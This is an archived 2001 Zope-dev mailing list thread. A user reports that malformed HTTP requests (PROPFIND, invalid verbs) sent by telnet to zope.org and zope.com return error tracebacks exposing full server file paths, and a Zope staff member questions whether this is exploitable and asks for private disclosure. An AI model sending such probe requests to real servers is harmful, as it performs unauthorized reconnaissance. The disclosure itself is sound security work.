[Zope-dev] Vulnerability in Zope
Paul Everitt
paul@zope.com
Sun, 23 Sep 2001 10:36:33 -0400
Do others consider this a vulnerability? While it reveals more=20
information than people might want, I'm curious about scenarios under=20
which it could be exploited.
If any of you know of something *specific*, meaning it's a genuinely=20
exploitable vulnerability, please email me or Brian Lloyd=20
(brian@zope.com) directly, rather than explain to the world how to do it.
--Paul
ALife wrote:
> Found vulnerability: retrieve a full path to local files in Zope.
>=20
> ---[ Example 1 (Linux):
>=20
> telnet www.zope.org 80
>=20
> PROPFIND / HTTP/1.0
>=20
> F
> G
> H
> J
> K
> L
> HTTP/1.0 500 Internal Server Error
> Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/=
1.1b1
> Date: Mon, 10 Sep 2001 15:38:59 GMT
> Content-Length: 7058
> Ms-Author-Via: DAV
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS=
/Property
> Sheets.py
> Bobo-Exception-Type: TypeError
> Content-Length: 7058
> Ms-Author-Via: DAV
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS=
/Property
> Sheets.py
> Bobo-Exception-Type: TypeError
> Content-Type: text/html
> Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Trans=
itional//
> EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE=
>Welcome
> to Zope.org</TITLE> <link rel=3D"stylesheet" href=3D"http://www.zope.=
org/zope_css"
> type=3D"text/css"> </HEAD> <BODY B
> Bobo-Exception-Line: 369
>=20
>=20
> ...
>=20
>=20
> <!--
> Traceback (innermost last):
> File /usr/local/base/Zope-2.3.2-m=
odified/l
> ib/python/ZPublisher/Publish.py, line 223, in publish_module
> File /usr=
/local/ba
> se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in p=
ublish
> =
F
> ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, li=
ne 221, i
> n zpublisher_exception_hook
> (Object: ApplicationDefaultPermissions)
> =
File /us
> r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line=
171, in
> publish
> File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher=
/mapply.p
> y, line 160, in mapply
> (Object: PROPFIND)
> File /usr/local/base/Zope=
-2.3.2-mo
> dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
> (O=
bject: PR
> OPFIND)
> File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Res=
ource.py,
> line 222, in PROPFIND
> (Object: ApplicationDefaultPermissions)
> File=
/usr/loc
> al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in =
apply
> =
Fi
> le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, li=
ne 219, i
> n apply
> File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/dav=
cmds.py,
> line 219, in apply
> File /usr/local/base/Zope-2.3.2-modified/lib/python=
/webdav/d
> avcmds.py, line 219, in apply
> File /usr/local/base/Zope-2.3.2-modified=
/lib/pyth
> on/webdav/davcmds.py, line 175, in apply
> File /usr/local/base/Zope-2.3=
.2-modifi
> ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
> (Obje=
ct: Virtu
> al)
> TypeError: (see above)
>=20
> -->
> Host has closed connection.
>=20
> ---[ Example 2 (Linux):
> telnet www.zope.com 80
>=20
> GGGG / HTTP/1.0
> or NOTREALCOMMAND / HTTP/1.0
>=20
>=20
> HTTP/1.0 404 Not Found
> Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/=
1.1b1
> Date: Fri, 21 Sep 2001 12:51:48 GMT
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPu=
blisher/H
> TTPResponse.py
> Content-Type: text/html
> Bobo-Exception-Type: NotFound
> Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Trans=
itional//
> EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE=
>Welcome
> to Zope.org</TITLE> <link rel=3D"stylesheet" href=3D"http://www.zope.=
org/zope_css"
> type=3D"text/css"> </HEAD> <BODY B
> Content-Length: 5845
> Bobo-Exception-Line: 547
>=20
> < ... >
>=20
> <!--
> Traceback (innermost last)=
:
> =
File /
> usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, li=
ne 223, i
> n publish_module
> File /usr/local/base/Zope-2.3.2-modified/lib/python/Z=
Publisher
> /Publish.py, line 187, in publish
> File /usr/local/base/Zope-2.3.2-modi=
fied/lib/
> python/Zope/__init__.py, line 221, in zpublisher_exception_hook
> (Obj=
ect: Appl
> icationDefaultPermissions)
> File /usr/local/base/Zope-2.3.2-modified/li=
b/python/
> ZPublisher/Publish.py, line 173, in publish
> File /usr/local/base/Zope-=
2.3.2-mod
> ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
> File=
/usr/loc
> al/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line=
547, in
> notFoundError
> NotFound: (see above)
>=20
> -->
> Host has closed connection.
>=20
>=20
> ---[ Example 3 (Win32):
>=20
> OPTIONS / HTTP/1.0
> or NOTREALCOMMAND / HTTP/1.0
>=20
> HTTP/1.0 404 Not Found
> Server: Zope/Zope 2.3.2 (binary release, python 1.5.2, win32-x86) ZServ=
er/1.1b1
> Date: Mon, 10 Sep 2001 15:06:43 GMT
> Bobo-Exception-File: D:\INSTOC~1\lib\python\webdav\NullResource.py
> Bobo-Exception-Type: Not Found
> Content-Type: text/html
> Location: http://SERVERNAME
> Bobo-Exception-Value: bobo exception
> Content-Length: 756
> Bobo-Exception-Line: 122
>=20
> <html><head><title>::</title></head><body bgcolor=3D"#FFFFFF">
>=20
> <h2>=CE=F8=E8=
=E1=EA=E0!</h2>
> =
<p>=CE
> =F8=E8=E1=EA=E0 =EF=F0=E8 =EF=EE=EF=FB=F2=EA=E5 =EE=EF=F3=E1=EB=E8=EA=EE=
=E2=E0=F2=FC =F0=E5=F1=F3=F0=F1.</p>
> <hr noshade>
> </body></html>
> <!-=
-
> =
Tracebac
> k (innermost last):
> File D:\INSTOC~1\lib\python\ZPublisher\Publish.py,=
line 223
> , in publish_module
> File D:\INSTOC~1\lib\python\ZPublisher\Publish.py,=
line 187
> , in publish
> File D:\INSTOC~1\lib\python\Zope\__init__.py, line 221, i=
n zpublis
> her_exception_hook
> (Object: iVirtualHostBase)
> File D:\INSTOC~1\lib\=
python\ZP
> ublisher\Publish.py, line 162, in publish
> File D:\INSTOC~1\lib\python\=
ZPublishe
> r\BaseRequest.py, line 340, in traverse
> File D:\INSTOC~1\lib\python\we=
bdav\Null
> Resource.py, line 122, in __bobo_traverse__
> (Object: iVirtualHostBas=
e)
> =
Not Fou
> nd: (see above)
>=20
> -->
> Host has closed connection.
>=20
>=20
> _______________________________________________
> Zope-Dev maillist - Zope-Dev@zope.org
> http://lists.zope.org/mailman/listinfo/zope-dev
> ** No cross posts or HTML encoding! **
> (Related lists -=20
> http://lists.zope.org/mailman/listinfo/zope-announce
> http://lists.zope.org/mailman/listinfo/zope )
>=20